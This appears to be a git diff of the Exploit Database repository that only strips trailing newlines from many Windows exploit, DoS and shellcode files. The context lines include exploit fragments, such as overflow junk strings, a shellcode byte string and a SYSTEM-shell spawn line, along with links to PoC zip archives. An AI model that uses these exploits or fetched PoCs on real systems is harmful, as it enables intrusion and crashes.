a/platforms/win_x86-64/local/40336.py b/platforms/win_x86-64/local/40336.py index 443e63817..2f2aac45d 100755 --- a/platforms/win_x86-64/local/40336.py +++ b/platforms/win_x86-64/local/40336.py @@ -67,4 +67,4 @@ finally: debug.stop() - + \ No newline at end of file diff --git a/platforms/win_x86-64/local/40337.py b/platforms/win_x86-64/local/40337.py index 6dc80cc73..0f1411e11 100755 --- a/platforms/win_x86-64/local/40337.py +++ b/platforms/win_x86-64/local/40337.py @@ -90,4 +90,4 @@ finally: debug.stop() - + \ No newline at end of file diff --git a/platforms/win_x86-64/local/40342.py b/platforms/win_x86-64/local/40342.py index 33bef474f..282a4a3f8 100755 --- a/platforms/win_x86-64/local/40342.py +++ b/platforms/win_x86-64/local/40342.py @@ -69,6 +69,4 @@ try: memory_search(pid) finally: - debug.stop() - - + debug.stop() \ No newline at end of file diff --git a/platforms/win_x86-64/local/40380.py b/platforms/win_x86-64/local/40380.py index f4188e66a..82ab85807 100755 --- a/platforms/win_x86-64/local/40380.py +++ b/platforms/win_x86-64/local/40380.py @@ -75,4 +75,4 @@ try: debug.loop() finally: - debug.stop() + debug.stop() \ No newline at end of file diff --git a/platforms/win_x86-64/local/41605.txt b/platforms/win_x86-64/local/41605.txt index 48f473eaf..cb248ed09 100755 --- a/platforms/win_x86-64/local/41605.txt +++ b/platforms/win_x86-64/local/41605.txt @@ -17,4 +17,4 @@ More information: - https://github.com/rwfpl/rewolf-pcausa-exploit/tree/4045cd9b45d647430d779f5b0a018a7a11d6ca2a PoC: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41605.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41605.zip \ No newline at end of file diff --git a/platforms/win_x86-64/local/41908.txt b/platforms/win_x86-64/local/41908.txt index bc094c6d9..2a3c12431 100755 --- a/platforms/win_x86-64/local/41908.txt +++ b/platforms/win_x86-64/local/41908.txt @@ -41,4 +41,4 @@ Scriptlet code is loaded and access to the device driver is allowed. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41908.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41908.zip \ No newline at end of file diff --git a/platforms/win_x86-64/remote/39999.rb b/platforms/win_x86-64/remote/39999.rb index a22d3ac16..972e5ad34 100755 --- a/platforms/win_x86-64/remote/39999.rb +++ b/platforms/win_x86-64/remote/39999.rb @@ -136,5 +136,4 @@ use anonymous and any password to login the ftp remotely,then send a command "ls disconnect end - end - + end \ No newline at end of file diff --git a/platforms/win_x86-64/shellcode/13719.txt b/platforms/win_x86-64/shellcode/13719.txt index cf72ce810..8025ca96f 100755 --- a/platforms/win_x86-64/shellcode/13719.txt +++ b/platforms/win_x86-64/shellcode/13719.txt @@ -23,4 +23,4 @@ int main(int argc, char **argv) { int *ret; ret = (int *)&ret + 2; (*ret) = (int) shellcode; -} +} \ No newline at end of file diff --git a/platforms/win_x86-64/shellcode/40781.c b/platforms/win_x86-64/shellcode/40781.c index 9ddb29aef..9dc7e61ef 100755 --- a/platforms/win_x86-64/shellcode/40781.c +++ b/platforms/win_x86-64/shellcode/40781.c @@ -648,11 +648,4 @@ void inject(DWORD pid) } else printf("shellcode Execution Successfull"); -} - - - - - - - +} \ No newline at end of file diff --git a/platforms/win_x86-64/shellcode/40821.c b/platforms/win_x86-64/shellcode/40821.c index 14c806d5c..29a545e65 100755 --- a/platforms/win_x86-64/shellcode/40821.c +++ b/platforms/win_x86-64/shellcode/40821.c @@ -329,4 +329,4 @@ VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l); return 0; -} +} \ No newline at end of file diff --git a/platforms/win_x86-64/shellcode/40890.c b/platforms/win_x86-64/shellcode/40890.c index 8546f8bc1..d35a68cd5 100755 --- a/platforms/win_x86-64/shellcode/40890.c +++ b/platforms/win_x86-64/shellcode/40890.c @@ -502,4 +502,4 @@ ShowWindow(FindWindowA("ConsoleWindowClass",NULL),0); return 0; -} +} \ No newline at end of file diff --git a/platforms/win_x86-64/shellcode/40981.c b/platforms/win_x86-64/shellcode/40981.c index dbbf6763c..c2b1805dc 100755 --- a/platforms/win_x86-64/shellcode/40981.c +++ b/platforms/win_x86-64/shellcode/40981.c @@ -878,4 +878,4 @@ int main() return 0; -} +} \ No newline at end of file diff --git a/platforms/win_x86-64/shellcode/41072.c b/platforms/win_x86-64/shellcode/41072.c index cc5e25724..31644eea5 100755 --- a/platforms/win_x86-64/shellcode/41072.c +++ b/platforms/win_x86-64/shellcode/41072.c @@ -682,11 +682,4 @@ void inject(DWORD pid) { printf("Failed to Run Shellcode\n"); return ; } -} - - - - - - - +} \ No newline at end of file diff --git a/platforms/win_x86/dos/10102.pl b/platforms/win_x86/dos/10102.pl index 61591d7d5..13578e2b6 100755 --- a/platforms/win_x86/dos/10102.pl +++ b/platforms/win_x86/dos/10102.pl @@ -41,4 +41,4 @@ $cssdata = "#die\n{\nbackground: url(" . "A" x $size . ");\n}"; open(FD, '>' . $css); print FD $cssdata; - close(FD); + close(FD); \ No newline at end of file diff --git a/platforms/win_x86/dos/12457.txt b/platforms/win_x86/dos/12457.txt index 1e3a8c7fd..59113c902 100755 --- a/platforms/win_x86/dos/12457.txt +++ b/platforms/win_x86/dos/12457.txt @@ -31,4 +31,4 @@ position:absolute; shouldnt change <img> tag </div> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/win_x86/dos/15758.c b/platforms/win_x86/dos/15758.c index 474498a92..02732dc4f 100755 --- a/platforms/win_x86/dos/15758.c +++ b/platforms/win_x86/dos/15758.c @@ -44,4 +44,4 @@ int main(int argc, char *argv[]) { SendMessage((HWND) 16,(UINT) 13,0x80000000,0x00013370); // 0x13370 is the deref and 16 is the window handle of #32769 return 0; -} +} \ No newline at end of file diff --git a/platforms/win_x86/dos/1977.cpp b/platforms/win_x86/dos/1977.cpp index e4f513584..bc1a04c45 100755 --- a/platforms/win_x86/dos/1977.cpp +++ b/platforms/win_x86/dos/1977.cpp @@ -90,4 +90,4 @@ bool WINAPI DllMain(HINSTANCE hInst, DWORD dwReason, LPVOID lpReserved) return 1; } -// milw0rm.com [2006-07-02] +// milw0rm.com [2006-07-02] \ No newline at end of file diff --git a/platforms/win_x86/dos/3527.pl b/platforms/win_x86/dos/3527.pl index 706dae610..ffe936bd6 100755 --- a/platforms/win_x86/dos/3527.pl +++ b/platforms/win_x86/dos/3527.pl @@ -88,4 +88,4 @@ sub connect_host { return(1338); } -# milw0rm.com [2007-03-20] +# milw0rm.com [2007-03-20] \ No newline at end of file diff --git a/platforms/win_x86/dos/37881.txt b/platforms/win_x86/dos/37881.txt index e41ea93d6..4e680880f 100755 --- a/platforms/win_x86/dos/37881.txt +++ b/platforms/win_x86/dos/37881.txt @@ -25,5 +25,4 @@ function func(){ A sample fla, swf and AS file are attached. Note that this PoC needs to be hosted on a webserver to work and only works on 32-bit systems (tested on Windows Chrome). song1.mp3 should be put in the same folder on the server as the swf, it is needed for loadSound to work. This bug is likely only exploitable on 32-bit systems due to how the type-confused fields line up. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37881.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37881.zip \ No newline at end of file diff --git a/platforms/win_x86/dos/38265.txt b/platforms/win_x86/dos/38265.txt index d2c80fb04..5b71e9da4 100755 --- a/platforms/win_x86/dos/38265.txt +++ b/platforms/win_x86/dos/38265.txt @@ -9,5 +9,4 @@ please find the PoC and brief analysis for the issue attached. The analysis ment -- Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38265.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38265.zip \ No newline at end of file diff --git a/platforms/win_x86/dos/38266.txt b/platforms/win_x86/dos/38266.txt index 1ab60dad3..0deb81327 100755 --- a/platforms/win_x86/dos/38266.txt +++ b/platforms/win_x86/dos/38266.txt @@ -3,5 +3,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=339 The attached PoC demonstrate a use-after-free condition that occurs when operating on a DeferWindowPos object from multiple threads. The DeferWindowPos() call will trigger and block on the execution of a window procedure in a separate thread from which we call EndDeferWindowPos on the same handle. specialpool.txt contains the debugger output with Session Pool enabled, crash.txt the debugger output without Session Pool. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38266.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38266.zip \ No newline at end of file diff --git a/platforms/win_x86/dos/38267.txt b/platforms/win_x86/dos/38267.txt index a344b3cc8..ff8b2ff16 100755 --- a/platforms/win_x86/dos/38267.txt +++ b/platforms/win_x86/dos/38267.txt @@ -3,4 +3,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=335 Freed memory is accessed after switching between two desktops of which one is closed. The testcase crashes with and without special pool enabled. The attached crash output is with special enabled on win32k.sys and ntoskrnl.sys. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38267.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38267.zip \ No newline at end of file diff --git a/platforms/win_x86/dos/38268.txt b/platforms/win_x86/dos/38268.txt index 5ee0e02ee..83331b020 100755 --- a/platforms/win_x86/dos/38268.txt +++ b/platforms/win_x86/dos/38268.txt @@ -3,4 +3,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=321 The PoC triggers a crashes due to a pool buffer overflow while drawing the caption bar of window. The trigger depends on the current window layout and resolution. The PoC takes an offset on the command line to be able to test with different values, I tested this on two different Win7 32-bit VM's and had success with 0 and 475000 (Resolution was 1024x768 and 1280x1024). A bruteforce Python script is also attached which should trigger a crash fairly quickly. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38268.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38268.zip \ No newline at end of file diff --git a/platforms/win_x86/dos/38269.txt b/platforms/win_x86/dos/38269.txt index 2d92ce108..d9d5edaa1 100755 --- a/platforms/win_x86/dos/38269.txt +++ b/platforms/win_x86/dos/38269.txt @@ -3,4 +3,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=320 The PoC bug checks reliably with Special Pool enabled on writing to freed memory. A reference to the freed memory is held at offset +0x10 of the THREADINFO object. This memory is referenced in HmgAllocateObjectAttr which is called in multiple locations. The freed memory is a struct inside a Brush Object which is freed in the call NtGdiDeleteObjectApp. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38269.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38269.zip \ No newline at end of file diff --git a/platforms/win_x86/dos/38270.txt b/platforms/win_x86/dos/38270.txt index d78c2691b..3dba05d95 100755 --- a/platforms/win_x86/dos/38270.txt +++ b/platforms/win_x86/dos/38270.txt @@ -3,4 +3,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=313 The PoC triggers a pool buffer overflow in win32k!vSolidFillRect. ​When using Special Pool we get the crash immediately on the overwrite. Without Special Pool we often get a crash in the same function, but sometimes it crashes in a different function (similar to another issue, however with a different offset). This might be a result of the memory corruption or an out-of-memory condition before the overflow is triggered. Debugger output for all three different crashes attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38270.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38270.zip \ No newline at end of file diff --git a/platforms/win_x86/dos/38271.txt b/platforms/win_x86/dos/38271.txt index fe28d8c7e..75e7c7eed 100755 --- a/platforms/win_x86/dos/38271.txt +++ b/platforms/win_x86/dos/38271.txt @@ -4,4 +4,4 @@ This issue is very likely a null pointer issue affecting 32-bit Windows version. Debug output attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38271.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38271.zip \ No newline at end of file diff --git a/platforms/win_x86/dos/38273.txt b/platforms/win_x86/dos/38273.txt index 9d6296a60..51aeb543c 100755 --- a/platforms/win_x86/dos/38273.txt +++ b/platforms/win_x86/dos/38273.txt @@ -8,4 +8,4 @@ trigger.cpp should fire the issue, with caveats: Analysis is attached as a text file. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38273.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38273.zip \ No newline at end of file diff --git a/platforms/win_x86/dos/38274.txt b/platforms/win_x86/dos/38274.txt index 2883a840f..758be5c7b 100755 --- a/platforms/win_x86/dos/38274.txt +++ b/platforms/win_x86/dos/38274.txt @@ -20,4 +20,4 @@ win32k!HMChangeOwnerThread+0x40: --- Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38274.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38274.zip \ No newline at end of file diff --git a/platforms/win_x86/dos/38275.txt b/platforms/win_x86/dos/38275.txt index a18847955..3baa8d05e 100755 --- a/platforms/win_x86/dos/38275.txt +++ b/platforms/win_x86/dos/38275.txt @@ -16,4 +16,4 @@ At this time we are able to replace the freed object in memory. We are not able --- Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38275.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38275.zip \ No newline at end of file diff --git a/platforms/win_x86/dos/38276.txt b/platforms/win_x86/dos/38276.txt index 47880b871..742b03c8e 100755 --- a/platforms/win_x86/dos/38276.txt +++ b/platforms/win_x86/dos/38276.txt @@ -5,4 +5,4 @@ The attached PoC triggers a wild write on Win 7 32-bit with Special Pool enabled --- Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38276.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38276.zip \ No newline at end of file diff --git a/platforms/win_x86/dos/38277.txt b/platforms/win_x86/dos/38277.txt index 5acc9389f..f470bde33 100755 --- a/platforms/win_x86/dos/38277.txt +++ b/platforms/win_x86/dos/38277.txt @@ -5,4 +5,4 @@ The attached testcase crashes Win 7 with Special Pool on win32k while accessing --- Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38277.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38277.zip \ No newline at end of file diff --git a/platforms/win_x86/dos/38278.txt b/platforms/win_x86/dos/38278.txt index fc063b106..8f6c3878d 100755 --- a/platforms/win_x86/dos/38278.txt +++ b/platforms/win_x86/dos/38278.txt @@ -4,4 +4,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=457 The attached testcase crashes Win 7 with Special Pool enabled while accessing the freed global cursor object (_gpqCursor​). See poc.cpp for instructions on how to compile and run. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38278.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38278.zip \ No newline at end of file diff --git a/platforms/win_x86/dos/38279.txt b/platforms/win_x86/dos/38279.txt index 6c923eceb..d9bdc16fb 100755 --- a/platforms/win_x86/dos/38279.txt +++ b/platforms/win_x86/dos/38279.txt @@ -5,4 +5,4 @@ The attached PoC demonstrates a UAF condition with printer device contexts. The --- Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38279.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38279.zip \ No newline at end of file diff --git a/platforms/win_x86/dos/38280.txt b/platforms/win_x86/dos/38280.txt index bf7839969..4253f54f7 100755 --- a/platforms/win_x86/dos/38280.txt +++ b/platforms/win_x86/dos/38280.txt @@ -7,4 +7,4 @@ Multiple pool buffer overflows can be triggered through the NtGdiStretchBlt syst --- Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38280.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38280.zip \ No newline at end of file diff --git a/platforms/win_x86/dos/38307.txt b/platforms/win_x86/dos/38307.txt index ad070eb6e..9052b800b 100755 --- a/platforms/win_x86/dos/38307.txt +++ b/platforms/win_x86/dos/38307.txt @@ -5,4 +5,4 @@ The attached PoC triggers a buffer overflow in the NtGdiBitBlt​ system call. I --- Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38307.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38307.zip \ No newline at end of file diff --git a/platforms/win_x86/dos/38444.py b/platforms/win_x86/dos/38444.py index eb9566435..613bdc006 100755 --- a/platforms/win_x86/dos/38444.py +++ b/platforms/win_x86/dos/38444.py @@ -13,4 +13,4 @@ junk="A"*600000 file = "exploit.m3u" f=open(file,"w") f.write(junk); -f.close(); +f.close(); \ No newline at end of file diff --git a/platforms/win_x86/dos/39026.txt b/platforms/win_x86/dos/39026.txt index 38473f11d..32d14e830 100755 --- a/platforms/win_x86/dos/39026.txt +++ b/platforms/win_x86/dos/39026.txt @@ -7,5 +7,4 @@ Note that multiple PoC executions and simulated system activity (such as opening Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39026.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39026.zip \ No newline at end of file diff --git a/platforms/win_x86/dos/39027.txt b/platforms/win_x86/dos/39027.txt index cbad376e1..a3cce0410 100755 --- a/platforms/win_x86/dos/39027.txt +++ b/platforms/win_x86/dos/39027.txt @@ -7,5 +7,4 @@ Note that multiple PoC executions and simulated system activity may be required Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39027.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39027.zip \ No newline at end of file diff --git a/platforms/win_x86/dos/39797.py b/platforms/win_x86/dos/39797.py index a90b36b15..a73c9827b 100755 --- a/platforms/win_x86/dos/39797.py +++ b/platforms/win_x86/dos/39797.py @@ -119,4 +119,4 @@ if (open == 0): sock.close() print "No more files for you!" else: - print "Port "+str(port)+" does not seem to be open on "+host + print "Port "+str(port)+" does not seem to be open on "+host \ No newline at end of file diff --git a/platforms/win_x86/dos/39993.txt b/platforms/win_x86/dos/39993.txt index d412e80a3..a10fafdc3 100755 --- a/platforms/win_x86/dos/39993.txt +++ b/platforms/win_x86/dos/39993.txt @@ -50,5 +50,4 @@ The font is loaded and can be used with GDI. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39993.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39993.zip \ No newline at end of file diff --git a/platforms/win_x86/dos/4293.php b/platforms/win_x86/dos/4293.php index ac42b6ef3..246e279d1 100755 --- a/platforms/win_x86/dos/4293.php +++ b/platforms/win_x86/dos/4293.php @@ -21,4 +21,4 @@ win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) ?> -# milw0rm.com [2007-08-18] +# milw0rm.com [2007-08-18] \ No newline at end of file diff --git a/platforms/win_x86/dos/4318.php b/platforms/win_x86/dos/4318.php index 00214c496..cc3b3e44f 100755 --- a/platforms/win_x86/dos/4318.php +++ b/platforms/win_x86/dos/4318.php @@ -29,4 +29,4 @@ iis_getservicestate( $buf_unicode . $eip_unicode ); ?> -# milw0rm.com [2007-08-27] +# milw0rm.com [2007-08-27] \ No newline at end of file diff --git a/platforms/win_x86/dos/8611.pl b/platforms/win_x86/dos/8611.pl index 59de99f11..05ffc7352 100755 --- a/platforms/win_x86/dos/8611.pl +++ b/platforms/win_x86/dos/8611.pl @@ -32,4 +32,4 @@ while (my $client = $socket->accept) { } die "Can't accept socket ($!)\n"; -# milw0rm.com [2009-05-05] +# milw0rm.com [2009-05-05] \ No newline at end of file diff --git a/platforms/win_x86/dos/9606.pl b/platforms/win_x86/dos/9606.pl index e794b9643..8267908c6 100755 --- a/platforms/win_x86/dos/9606.pl +++ b/platforms/win_x86/dos/9606.pl @@ -31,4 +31,4 @@ $payload = $payload . '</script></html>'; print FD $payload; close(FD); -# milw0rm.com [2009-09-09] +# milw0rm.com [2009-09-09] \ No newline at end of file diff --git a/platforms/win_x86/local/11112.c b/platforms/win_x86/local/11112.c index e8d287fd4..0c93604f0 100755 --- a/platforms/win_x86/local/11112.c +++ b/platforms/win_x86/local/11112.c @@ -382,4 +382,4 @@ struct c4=(i>>24)&255; return ((int)c1<<24)+((int)c2<<16)+((int)c3<<8)+c4; } - } + } \ No newline at end of file diff --git a/platforms/win_x86/local/11408.c b/platforms/win_x86/local/11408.c index 2f551c73d..d418e1088 100755 --- a/platforms/win_x86/local/11408.c +++ b/platforms/win_x86/local/11408.c @@ -407,6 +407,4 @@ DWORD FindRetToEspAddress(VOID); s[i]=alphanum[rand()%(sizeof(alphanum)-1)]; } s[len]=0; - } - - + } \ No newline at end of file diff --git a/platforms/win_x86/local/14373.pl b/platforms/win_x86/local/14373.pl index 178531bf7..01ae0de73 100755 --- a/platforms/win_x86/local/14373.pl +++ b/platforms/win_x86/local/14373.pl @@ -63,4 +63,4 @@ my $shellcode = "\x4a\x47\x70\x46\x33\x49\x6f\x4a\x75\x41\x41"; open(MYFILE,'>>Sec4Ever.pls'); print MYFILE $junk.$ret.$padding.$shellcode; -close(MYFILE); +close(MYFILE); \ No newline at end of file diff --git a/platforms/win_x86/local/16678.rb b/platforms/win_x86/local/16678.rb index 0b660c5a3..6133b41e2 100755 --- a/platforms/win_x86/local/16678.rb +++ b/platforms/win_x86/local/16678.rb @@ -125,4 +125,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/win_x86/local/18137.rb b/platforms/win_x86/local/18137.rb index e368ef946..5658a27cc 100755 --- a/platforms/win_x86/local/18137.rb +++ b/platforms/win_x86/local/18137.rb @@ -114,4 +114,4 @@ class Metasploit3 < Msf::Exploit::Remote file_create(sploit) end -end +end \ No newline at end of file diff --git a/platforms/win_x86/local/18861.php b/platforms/win_x86/local/18861.php index 660fc68ad..27ee3dd3d 100755 --- a/platforms/win_x86/local/18861.php +++ b/platforms/win_x86/local/18861.php @@ -156,5 +156,4 @@ echo $arr; echo $spray; -?> - +?> \ No newline at end of file diff --git a/platforms/win_x86/local/34037.txt b/platforms/win_x86/local/34037.txt index 2e712cd62..2dde36a68 100755 --- a/platforms/win_x86/local/34037.txt +++ b/platforms/win_x86/local/34037.txt @@ -58,4 +58,4 @@ C:\Program Files (x86)\OpenVPN Technologies\PrivateTunnel\ptservice.exe NT AUTHO Successfully processed 1 files; Failed processing 0 files -C:\Users\user> +C:\Users\user> \ No newline at end of file diff --git a/platforms/win_x86/local/3451.c b/platforms/win_x86/local/3451.c index dc41e31ed..c577ff62e 100755 --- a/platforms/win_x86/local/3451.c +++ b/platforms/win_x86/local/3451.c @@ -221,4 +221,4 @@ int _tmain(int argc, _TCHAR* argv[]) return 0; } -// milw0rm.com [2007-03-10] +// milw0rm.com [2007-03-10] \ No newline at end of file diff --git a/platforms/win_x86/local/37732.c b/platforms/win_x86/local/37732.c index 895181c59..ed81815a2 100755 --- a/platforms/win_x86/local/37732.c +++ b/platforms/win_x86/local/37732.c @@ -213,4 +213,4 @@ int main (int argc, char **argv) exit(0); } } -} +} \ No newline at end of file diff --git a/platforms/win_x86/local/38403.txt b/platforms/win_x86/local/38403.txt index 6e51f3470..2d4dbfddf 100755 --- a/platforms/win_x86/local/38403.txt +++ b/platforms/win_x86/local/38403.txt @@ -52,4 +52,4 @@ Observed Result: The global drive specified has been replaced with a link to the encrypted volume. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38403.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38403.zip \ No newline at end of file diff --git a/platforms/win_x86/local/3888.c b/platforms/win_x86/local/3888.c index cbef57e4e..1c016eda3 100755 --- a/platforms/win_x86/local/3888.c +++ b/platforms/win_x86/local/3888.c @@ -316,4 +316,4 @@ int main(int argc, char *argv[]) { } -// milw0rm.com [2007-05-09] +// milw0rm.com [2007-05-09] \ No newline at end of file diff --git a/platforms/win_x86/local/3912.c b/platforms/win_x86/local/3912.c index 81436ecff..2ed041c49 100755 --- a/platforms/win_x86/local/3912.c +++ b/platforms/win_x86/local/3912.c @@ -180,4 +180,4 @@ void usage(char *progname){ exit(0); } -// milw0rm.com [2007-05-12] +// milw0rm.com [2007-05-12] \ No newline at end of file diff --git a/platforms/win_x86/local/39446.py b/platforms/win_x86/local/39446.py index 2ff0aaaa4..fd7f60bf5 100755 --- a/platforms/win_x86/local/39446.py +++ b/platforms/win_x86/local/39446.py @@ -278,4 +278,4 @@ out = c_ulong() inp = 0x1337 qip = ntdll.NtQueryIntervalProfile(inp, byref(out)) print "[*] Spawning a SYSTEM shell..." -os.system("cmd.exe /K cd c:\\windows\\system32") +os.system("cmd.exe /K cd c:\\windows\\system32") \ No newline at end of file diff --git a/platforms/win_x86/local/40039.cpp b/platforms/win_x86/local/40039.cpp index e1a8d087f..0407519d7 100755 --- a/platforms/win_x86/local/40039.cpp +++ b/platforms/win_x86/local/40039.cpp @@ -385,5 +385,4 @@ int main() { printf("All done, exiting\n"); return 0; -} - +} \ No newline at end of file diff --git a/platforms/win_x86/local/40564.c b/platforms/win_x86/local/40564.c index fd6cd2d3f..0849a69cf 100755 --- a/platforms/win_x86/local/40564.c +++ b/platforms/win_x86/local/40564.c @@ -807,4 +807,4 @@ int main(void) return 1; } -// EoF +// EoF \ No newline at end of file diff --git a/platforms/win_x86/local/40627.c b/platforms/win_x86/local/40627.c index 510de17ad..6b5bbddc0 100755 --- a/platforms/win_x86/local/40627.c +++ b/platforms/win_x86/local/40627.c @@ -535,4 +535,4 @@ int main(void) return 1; } -// EoF +// EoF \ No newline at end of file diff --git a/platforms/win_x86/local/8799.txt b/platforms/win_x86/local/8799.txt index 9ab10194d..a6b15aeae 100755 --- a/platforms/win_x86/local/8799.txt +++ b/platforms/win_x86/local/8799.txt @@ -38,4 +38,4 @@ so author will be not be responsible for any damage using this vulnerabilty. for more information visit Abysssec.com feel free to contact me at admin [at] abysssec.com -# milw0rm.com [2009-05-26] +# milw0rm.com [2009-05-26] \ No newline at end of file diff --git a/platforms/win_x86/remote/11615.txt b/platforms/win_x86/remote/11615.txt index d5b24f9aa..84761f667 100755 --- a/platforms/win_x86/remote/11615.txt +++ b/platforms/win_x86/remote/11615.txt @@ -28,4 +28,4 @@ big, 1 MsgBox "press F1 to close this annoying popup", ,"", big, 1 MsgBox "press F1 to close this annoying popup", ,"", big, 1 </script> -</html> +</html> \ No newline at end of file diff --git a/platforms/win_x86/remote/1264.pl b/platforms/win_x86/remote/1264.pl index f85f7e256..9fd5a6800 100755 --- a/platforms/win_x86/remote/1264.pl +++ b/platforms/win_x86/remote/1264.pl @@ -336,4 +336,4 @@ print scalar <$sock>; close $sock; -# milw0rm.com [2005-10-20] +# milw0rm.com [2005-10-20] \ No newline at end of file diff --git a/platforms/win_x86/remote/16466.rb b/platforms/win_x86/remote/16466.rb index 59fe5dae5..3f49a9351 100755 --- a/platforms/win_x86/remote/16466.rb +++ b/platforms/win_x86/remote/16466.rb @@ -121,4 +121,4 @@ class Metasploit3 < Msf::Exploit::Remote data[ 96, seh.length] = seh end -end +end \ No newline at end of file diff --git a/platforms/win_x86/remote/16714.rb b/platforms/win_x86/remote/16714.rb index 0b7406541..c6754907c 100755 --- a/platforms/win_x86/remote/16714.rb +++ b/platforms/win_x86/remote/16714.rb @@ -95,4 +95,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/win_x86/remote/16731.rb b/platforms/win_x86/remote/16731.rb index 53fa4c004..a0358bedd 100755 --- a/platforms/win_x86/remote/16731.rb +++ b/platforms/win_x86/remote/16731.rb @@ -91,4 +91,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/win_x86/remote/16738.rb b/platforms/win_x86/remote/16738.rb index aa73edc68..cdd38874e 100755 --- a/platforms/win_x86/remote/16738.rb +++ b/platforms/win_x86/remote/16738.rb @@ -89,5 +89,4 @@ class Metasploit3 < Msf::Exploit::Remote return end -end - +end \ No newline at end of file diff --git a/platforms/win_x86/remote/16743.rb b/platforms/win_x86/remote/16743.rb index d420d1e02..99fd80294 100755 --- a/platforms/win_x86/remote/16743.rb +++ b/platforms/win_x86/remote/16743.rb @@ -107,5 +107,4 @@ class Metasploit3 < Msf::Exploit::Remote return end -end - +end \ No newline at end of file diff --git a/platforms/win_x86/remote/16751.rb b/platforms/win_x86/remote/16751.rb index 1c1038474..28d7cf254 100755 --- a/platforms/win_x86/remote/16751.rb +++ b/platforms/win_x86/remote/16751.rb @@ -103,4 +103,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/win_x86/remote/16759.rb b/platforms/win_x86/remote/16759.rb index 63c6b4bfc..e5adc305b 100755 --- a/platforms/win_x86/remote/16759.rb +++ b/platforms/win_x86/remote/16759.rb @@ -82,4 +82,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/win_x86/remote/16763.rb b/platforms/win_x86/remote/16763.rb index 7ba34dfbe..b67209665 100755 --- a/platforms/win_x86/remote/16763.rb +++ b/platforms/win_x86/remote/16763.rb @@ -98,4 +98,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/win_x86/remote/16782.rb b/platforms/win_x86/remote/16782.rb index 3d87a19d1..151bea5f5 100755 --- a/platforms/win_x86/remote/16782.rb +++ b/platforms/win_x86/remote/16782.rb @@ -328,4 +328,4 @@ class 